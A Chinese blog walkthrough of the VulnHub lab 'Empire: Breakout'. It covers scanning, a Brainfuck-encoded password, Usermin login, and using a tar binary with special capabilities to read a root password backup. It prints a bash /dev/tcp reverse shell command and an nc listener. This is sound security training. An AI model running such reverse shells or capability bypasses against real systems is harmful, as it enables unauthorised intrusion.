首页 > 其他分享 >vulnhub:Empire: Breakout

vulnhub:Empire: Breakout

时间:2024-12-03 13:32:05浏览次数:10  
标签:文件 tcp tar 192.168 getcap Breakout vulnhub Empire 权限

靶机地址
Empire: Breakout ~ VulnHub

打靶过程

信息收集:

目标ip:

192.168.6.10

在目标ip未知的情况下可用arp-scan命令发现主机

arp-scan -l

扫描目标开放端口

nmap -sS -Pn -sV 192.168.6.10

扫描得到

开放端口和服务

端口号

状态

服务名称

版本信息

说明

80/tcp

open

http

Apache httpd 2.4.51 ((Debian))

目标主机运行了 Apache HTTP 服务,可能是 Web 应用或默认页面。

139/tcp

open

netbios-ssn

Samba smbd 4.6.2

Samba 服务,用于文件和打印共享,可能存储敏感数据或存在漏洞。

445/tcp

open

netbios-ssn

Samba smbd 4.6.2

同样是 Samba 服务,监听 445 端口。可通过 SMB 协议进行交互。

10000/tcp

open

http

MiniServ 1.981 (Webmin httpd)

Webmin 服务,可能是远程管理工具的 Web 界面,存在被暴力破解或利用的风险。

20000/tcp

open

http

MiniServ 1.830 (Webmin httpd)

另一 Webmin 服务实例,可能有不同的配置或用途。

访问192.168.6.9:80

Apache默认界面

查看源码

发现有Brainfuck加密

解密得到

访问192.168.6.10:10000

提示不安全

https访问

Webmin登录页面

访问192.168.6.10:20000

Usermin登录页面

139和445端口表明主机开启了SMB服务,使用enum4linux对SMB进行枚举检测

enum4linux 192.168.6.10

扫描得到一个本地用户

cyber

尝试利用

user:cyber

password:.2uqPEfj3D<P'a-3

登录俩个登录页面

成功登录usermin

左下角发现shell

进入

得到第一个flag

发现有敏感文件tar

查看文件权限

getcap命令查看tar文件是否具备特殊权限

(getcap 是一个 Linux 工具,用于查看文件是否具有特定的 Capability(特殊权限)。这些特殊权限允许特定程序在没有完整 root 权限的情况下执行特定的高权限操作。)

getcap tar

即tar文件具有可执行权,并且具有跨目录读取任意文件的特殊权限

因此可以利用tar文件对重要信息文件进行打包再解压处理,从而实现绕过文件权限限制。

寻找主机上有没有备份文件或与密码相关的文件

find / -name '*pass*'

find / -name '*.bak*'

找到一个备份文件

直接访问,权限不足

利用tar文件,将.old_pass.bak文件压缩为一个文件包

./tar -cvf 1.tar /var/backups/.old_pass.bak

解压1.tar文件包,实现权限绕过

拿到root密码

尝试登录

登陆失败

反弹shell

kali监听:

nc -lvp 6666

靶机输入:

bash -i >& /dev/tcp/192.168.6.5/6666 0>&1

提权成功

查看根目录

查看root目录

得到第二个flag

命令和工具的使用

arp-scan

Nmap

enum4linux

getcap

getcap命令查看tar文件是否具备特殊权限

(getcap 是一个 Linux 工具,用于查看文件是否具有特定的 Capability(特殊权限)。这些特殊权限允许特定程序在没有完整 root 权限的情况下执行特定的高权限操作。)

tar

压缩

解压

反弹shell

bash -i >& /dev/tcp/<address>/<端口> 0>&1

一个常用的反弹 shell 命令。常用于把内网的机器反弹到外网机器上,从而实现外网主机控制内网主机。

在内网环境也可以用。

这个命令的功能简单来说就是将输入输出重定向到指定的位置,达到反弹 shell 的结果。

brainfuck在线编码

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

标签:文件,tcp,tar,192.168,getcap,Breakout,vulnhub,Empire,权限
From: https://blog.csdn.net/Ra1n3/article/details/144128179

相关文章

  • Breakout pg walkthrough Intermediate
    nmap┌──(root㉿kali)-[~/lab]└─#nmap-p--A192.168.192.182StartingNmap7.94SVN(https://nmap.org)at2024-12-0204:50UTCNmapscanreportfor192.168.192.182Hostisup(0.071slatency).Notshown:65533closedtcpports(reset)PORTSTATESERV......
  • Vulnhub sick0s1.1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.14122ssh,3128squid-http,但8080http是关闭的Squid是一个高性能的开源代理服务器软件,它支持多种协议,包括HTTP、HTTPS、FTP等。它通常用于以下几种用途:1、Web代理:作为......
  • Vulnhub-Earth靶机笔记
    Earth靶机笔记概述这是一台Vulnhub的靶机,主要是Earth靶机地址:https://vulnhub.com/entry/the-planets-earth,755/#download一、nmap扫描1、端口扫描-sT以TCP全连接扫描,--min-rate10000以最低10000速率进行扫描,-p-进行全端口扫描,-oports结果输出到ports文件......
  • Vulnhub WestWild1.1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.140开了22ssh,80http,两个smb服务详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,80,139,445192.168.231.140漏洞扫描nmap--script=vuln-p22,80,139,445......
  • Vulnhub Kioptrix4
    VulnhubKioptrix40x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.139开放22ssh,80http,139netbios-ssn,445microsoft-ds,后两个是smb服务端口139(NetBIOS-SSN):用于通过NetBIOS协议在局域网内实现文件和打印机共享。虽然......
  • 7. vulnhub渗透测试综合靶场DC-7
    目录信息收集渗透测试本次渗透测试学习收获信息收集arp-scan扫描主机arp-scan192.168.200.0/24nmap扫描nmap-sS192.168.200.152查看网站信息whatwebhttp://192.168.200.152利用网站分析插件看到CMS:Drupal8渗透测试目录爆破发现后台dirsearch-uhttp......
  • VulnHub-Sick0s1.1解法二shellshock漏洞
    免责声明本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓励也不参与任何形式的......
  • Vulnhub Tr0ll
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24IP地址为192.168.231.137全端口扫描nmap--min-rate10000-p-192.168.231.137开放了21ftp,22ssh,80httpUDP扫描nmap-sU--min-rate10000-p-192.168.231.137无UDP端口开放接下来进行详细端口扫描nmap-sT-sC-......
  • Vulnhub--y0usef靶场漏洞多种方法详解复现
    目录0x00准备工作1.靶场导入2.virtualbox网络设置3.靶机和攻击机的IP地址0x01信息收集1.主机发现2.详细信息扫描3.目录扫描0x02 漏洞挖掘1.403绕过2.burp爆破3.方法一:文件上传4.本地提权5.方法二:nc反弹shell6.方法三:使用msfvenom工具0x00准备工作靶场下载:h......
  • vulnhub-XXE靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、xml外部实体注入四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.202.134)靶 机:ubuntu17.10(192.168.202.161)2、使用工具/软件Kali:arp-scan(主机探测)、nmap......